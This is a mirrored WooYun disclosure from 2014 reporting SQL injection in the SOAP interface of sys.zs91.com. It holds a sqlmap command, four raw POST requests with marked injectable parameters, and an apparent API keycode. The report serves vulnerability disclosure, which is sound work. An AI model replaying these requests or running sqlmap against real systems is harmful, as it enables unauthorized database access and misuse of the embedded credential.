乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-02: 细节已通知厂商并且等待厂商处理中 2014-09-04: 厂商已经确认,细节仅向厂商公开 2014-09-14: 细节向核心白帽子及相关领域专家公开 2014-09-24: 细节向普通白帽子公开 2014-10-04: 细节向实习白帽子公开 2014-10-17: 细节向公众公开
厂商确认很快呀!整理了几个部分接口 还是存在SQL注入
python sqlmap.py -r abc.txt --dbms=mysql --dbs abc.txt内容为code代码 1 mtype字段
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1Host: sys.zs91.comProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: text/json; charset=utf-8Content-Length: 430Connection: keep-aliveUser-Agent: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <doAct xmlns="http://sys.zs91.com"> <args>{"keycode":"hxRN98VARF1BYUXo","AccountID":"282","page":"1","mtype":"865'"}</args><operate>getmessinfo</operate> </doAct> </soap:Body></soap:Envelope>
2 插入数据处
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1Host: sys.zs91.comProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: text/json; charset=utf-8Content-Length: 524Connection: keep-aliveUser-Agent: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <doAct xmlns="http://sys.zs91.com"> <args>{"TitleName":"å ¨é¨","IpAddress":"","ParentId":"805*","CreateDate":"2014-09-02 14:06:19","AccountID":"282","PhoneType":"2","TitleId":"1056","keycode":"hxRN98VARF1BYUXo"}</args><operate>flowcount</operate> </doAct> </soap:Body></soap:Envelope>
3 登录功能
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1Host: sys.zs91.comProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: text/json; charset=utf-8Content-Length: 447Connection: keep-aliveUser-Agent: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <doAct xmlns="http://sys.zs91.com"> <args>{"AccountID":"282'","username":"13311111111","userpass":"111111","keycode":"hxRN98VARF1BYUXo"}</args><operate>chklogin</operate> </doAct> </soap:Body></soap:Envelope>
POST /Interface/www/soap/stdserver.php?wsdl HTTP/1.1Host: sys.zs91.comProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: text/json; charset=utf-8Content-Length: 464Connection: keep-aliveUser-Agent: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <doAct xmlns="http://sys.zs91.com"> <args>{"type":"0","MemberID":"1","AccountID":"282","page":"1","stype":"0","ShopId":"895'","keycode":"hxRN98VARF1BYUXo"}</args><operate>gqlist</operate> </doAct> </soap:Body></soap:Envelope>
对获取得参数过滤
危害等级:低
漏洞Rank:5
确认时间:2014-09-04 15:27
正准备安排时间处理?
暂无